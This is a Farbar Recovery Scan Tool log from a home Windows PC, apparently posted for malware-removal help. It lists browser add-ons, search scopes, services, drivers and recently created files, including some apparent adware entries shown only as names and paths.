ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.c...client&ie=UTF-8
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK/1
SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPDTDF
SearchScopes: HKLM - {9C2040EB-1D7A-452C-AE06-21B3CCCA9794} URL = http://www.amazon.co...ds={searchTerms}
SearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPDTDF
SearchScopes: HKLM - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = http://en.wikipedia....ch={searchTerms}
SearchScopes: HKLM-x32 - DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = http://feed.helperba...&q={searchTerms}
SearchScopes: HKLM-x32 - {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = http://feed.helperba...&q={searchTerms}
SearchScopes: HKCU - 00D0686072044826B4B861174FBD522F URL = http://feed.helperba...&q={searchTerms}
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - No Name - {ae07101b-46d4-4a98-af68-0333ea26e113} - No File
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - No Name - {ae07101b-46d4-4a98-af68-0333ea26e113} - No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.appl...ex/qtplugin.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/VirtualEarth3D,version=4.0 -> c:\Program Files (x86)\Virtual Earth 3D\ ()
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/VirtualEarth3D,version=4.0 -> c:\Program Files (x86)\Virtual Earth 3D\ ()
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\MoM\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF Plugin HKCU: intel.com/AppUpx64 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll No File
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: HP Smart Print - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2013-04-02]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF [2014-10-27]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn [2014-11-08]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Newhub) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\aoejbmmillcdifgagjpdlaamnalbielp [2014-03-18]
CHR Extension: (Google Drive) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-05]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (AdBlock) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-10-23]
CHR Extension: (Norton Identity Safe) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-12]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-04]
CHR Extension: (Norton Security Toolbar) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2014-06-20]
CHR Extension: (Google Wallet) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-04]
CHR Extension: (The World of Amazon) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\paoffajmgbcahadajcmpbdabpkapckkj [2014-10-23]
CHR HKLM\...\Chrome\Extension: [aoejbmmillcdifgagjpdlaamnalbielp] - C:\Users\MoM\AppData\Local\nwhb-v9.4.15.crx [2014-03-18]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-27]
CHR HKCU\...\Chrome\Extension: [aoejbmmillcdifgagjpdlaamnalbielp] - C:\Users\MoM\AppData\Local\nwhb-v9.4.15.crx [2014-03-18]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MoM\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2013-05-03]
CHR HKLM-x32\...\Chrome\Extension: [aoejbmmillcdifgagjpdlaamnalbielp] - C:\Users\MoM\AppData\Local\nwhb-v9.4.15.crx [2014-03-18]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-27]
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 DTSRVC; C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe [129840 2011-08-19] (Portrait Displays, Inc.)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 MotoHelper; C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe [226624 2011-01-27] ()
R2 N360; C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1128952 2011-05-05] (PDF Complete Inc)
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141030.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-20] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-08-26] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-08-26] (Symantec Corporation)
S3 FintekCIR; C:\Windows\system32\drivers\FintekCIR.sys [30248 2009-11-13] (Fintek)
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141106.001\IDSvia64.sys [633560 2014-10-27] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141107.002\ENG64.SYS [129752 2014-08-11] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141107.002\EX64.SYS [2137304 2014-08-11] (Symantec Corporation)
R3 NWVoltron; C:\Windows\system32\drivers\NWVoltron.sys [28440 2011-06-23] ()
S3 NWWakeFilterV; C:\Windows\system32\drivers\NWWakeFilterV.sys [16152 2011-06-23] (n/a)
R1 SRTSP; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2014-08-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-27] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-08 00:29 - 2014-11-08 00:29 - 00000000 ____D () C:\Users\MoM\Desktop\FRST-OlderVersion
2014-11-07 16:00 - 2014-11-07 16:01 - 00044446 _____ () C:\Users\MoM\Desktop\Addition.txt
2014-11-07 15:57 - 2014-11-08 00:45 - 00024354 _____ () C:\Users\MoM\Desktop\FRST.txt
2014-11-06 20:33 - 2014-11-06 20:43 - 00000000 ____D () C:\Program Files (x86)\Strife
2014-11-06 20:09 - 2014-11-06 20:26 - 1778598272 _____ () C:\Users\MoM\Downloads\StrifeWindows-0.4.0.7 (1).exe
2014-11-06 20:08 - 2014-11-06 20:08 - 00127996 _____ () C:\Users\MoM\Downloads\StrifeWindows-0.4.5.1 (1).torrent
2014-11-06 20:07 - 2014-11-06 20:07 - 00127996 _____ () C:\Users\MoM\Downloads\StrifeWindows-0.4.5.1.torrent
2014-11-06 19:55 - 2014-11-08 00:45 - 00000000 ____D () C:\FRST
2014-11-06 19:54 - 2014-11-08 00:29 - 02115072 _____ (Farbar) C:\Users\MoM\Desktop\FRST64.exe
2014-11-06 17:51 - 2014-11-06 17:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-11-06 17:51 - 2014-09-26 18:42 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-11-06 17:51 - 2014-09-26 18:36 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-11-06 17:51 - 2014-09-26 18:36 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-11-06 17:51 - 2014-09-26 18:35 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-11-06 17:50 - 2014-11-06 17:51 - 00004714 _____ () C:\Windows\SysWOW64\jupdate-1.7.0_71-b14.log
2014-11-04 16:57 - 2014-11-04 16:57 - 03060320 _____ (Symantec Corporation) C:\Users\MoM\Downloads\NPE.exe
2014-11-03 18:13 - 2014-11-08 00:40 - 00000324 _____ () C:\Windows\Tasks\HPCeeScheduleForMoM.job
2014-11-03 18:13 - 2014-11-07 19:13 - 00003174 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForMoM
2014-11-03 17:44 - 2014-11-03 17:44 - 00003416 ____N () C:\bootsqm.dat
2014-11-03 17:43 - 2014-11-03 17:43 - 00000000 __SHD () C:\found.001
2014-10-31 22:02 - 2014-10-31 22:02 - 00000000 ____D () C:\Windows\SysWOW64\N360_BACKUP
2014-10-30 18:52 - 2014-10-30 18:52 - 00000000 ____D () C:\Users\MoM\AppData\Local\ASworks
2014-10-30 18:51 - 2014-11-03 19:17 - 00000000 ____D () C:\Users\MoM\AppData\Local\Ovxics
2014-10-28 17:48 - 2014-10-28 17:48 - 00002954 _____ () C:\Windows\System32\Tasks\{028D6754-B91E-48E6-B4CD-B5C5FE824D0D}
2014-10-28 17:46 - 2014-10-28 17:46 - 00002954 _____ () C:\Windows\System32\Tasks\{C412F7C1-C691-4EFB-ADF0-5BEFDC15A9DE}
2014-10-28 17:44 - 2014-10-28 17:44 - 00002954 _____ () C:\Windows\System32\Tasks\{D658EF69-9FFE-447C-B8F2-3646868E5B4A}
2014-10-28 17:44 - 2014-10-28 17:44 - 00002954 _____ () C:\Windows\System32\Tasks\{CCB504FD-5FE8-4186-973E-917BD2827037}
2014-10-28 17:43 - 2014-10-28 17:43 - 00002954 _____ () C:\Windows\System32\Tasks\{F7EBFBE8-77E6-4981-A199-E4A965F6B157}
2014-10-28 17:42 - 2014-10-28 17:42 - 00002954 _____ () C:\Windows\System32\Tasks\{B23BCC20-3143-42BB-AEE7-28373E021FD9}
2014-10-27 17:58 - 2014-10-27 17:58 - 00000000 ____D () C:\Windows\System32\Tasks\Norton 360
2014-10-27 17:55 - 2014-10-27 17:55 - 00177752 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2014-10-27 17:55 - 2014-10-27 17:55 - 00008222 _____ () C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
2014-10-27 17:55 - 2014-10-27 17:55 - 00002393 _____ () C:\Users\Public\Desktop\Norton 360.lnk
2014-10-27 17:54 - 2014-10-27 17:55 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360
2014-10-27 17:54 - 2014-10-27 17:54 - 00000000 ____D () C:\Program Files (x86)\Norton 360
2014-10-27 17:51 - 2014-10-27 17:51 - 00001296 _____ () C:\Users\MoM\Desktop\Norton Installation Files.lnk
2014-10-27 15:56 - 2014-11-05 16:59 - 00000000 ____D () C:\Users\MoM\AppData\Local\LogMeIn Rescue Applet
2014-10-26 19:47 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-26 19:47 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-26 19:47 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-26 19:47 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-26 19:47 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-26 19:47 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-26 19:47 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-26 19:47 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-26 19:47 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-26 19:47 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-26 19:47 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-26 19:47 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-26 19:47 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-26 19:47 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-26 19:47 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-26 19:47 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-26 19:47 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-26 19:47 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-26 19:47 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-26 19:47 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-26 19:47 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-26 19:47 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-26 19:47 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-26 19:47 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-26 19:47 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-26 19:47 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-26 19:47 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-26 19:47 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-26 19:47 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-26 19:47 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-26 19:47 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-26 19:47 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-26 19:47 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-26 19:47 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-26 19:47 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-26 19:47 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-26 19:47 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-26 19:47 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-26 19:47 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-26 19:47 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-26 19:47 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-26 19:47 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-26 19:47 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-26 19:47 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-26 19:47 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-26 19:47 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-26 19:47 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-26 19:47 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-26 19:47 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-26 19:47 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-26 19:47 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-26 19:47 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-26 19:47 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-26 19:47 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-26 19:47 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-26 19:47 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-26 19:47 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-26 19:47 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-26 19:47 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
